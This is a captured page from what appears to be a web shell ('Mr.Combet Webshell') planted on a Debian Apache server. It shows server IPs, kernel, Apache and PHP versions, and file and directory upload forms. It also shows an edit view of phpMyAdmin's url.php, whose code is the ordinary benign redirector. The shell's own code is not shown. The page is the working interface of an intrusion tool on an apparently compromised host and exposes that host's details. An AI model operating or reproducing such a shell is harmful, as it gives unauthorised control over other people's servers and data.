Mr.Combet Webshell
Your IP :
172.18.0.175
Server IP :
172.67.223.119
Server :
Linux crmarketing.1092.w795 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
Server Software :
Apache/2.4.38 (Debian)
PHP Version :
7.4.33
Add File :
Submit
Add Directory :
Submit
Dir :
~
/
var
/
www
/
pma
/
Edit File Name :
url.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * URL redirector to avoid leaking Referer with some sensitive information. * * @package PhpMyAdmin */ use PhpMyAdmin\Core; use PhpMyAdmin\Sanitize; use PhpMyAdmin\Response; /** * Gets core libraries and defines some variables */ define('PMA_MINIMUM_COMMON', true); require_once './libraries/common.inc.php'; // Only output the http headers $response = Response::getInstance(); $response->getHeader()->sendHttpHeaders(); $response->disable(); if (! Core::isValid($_GET['url']) || ! preg_match('/^https:\/\/[^\n\r]*$/', $_GET['url']) || ! Core::isAllowedDomain($_GET['url']) ) { Core::sendHeaderLocation('./'); } else { // JavaScript redirection is necessary. Because if header() is used // then web browser sometimes does not change the HTTP_REFERER // field and so with old URL as Referer, token also goes to // external site. echo "<script type='text/javascript'> window.onload=function(){ window.location='" , Sanitize::escapeJsString($_GET['url']) , "'; } </script>"; // Display redirecting msg on screen. // Do not display the value of $_GET['url'] to avoid showing injected content echo __('Taking you to the target site.'); } die();
Save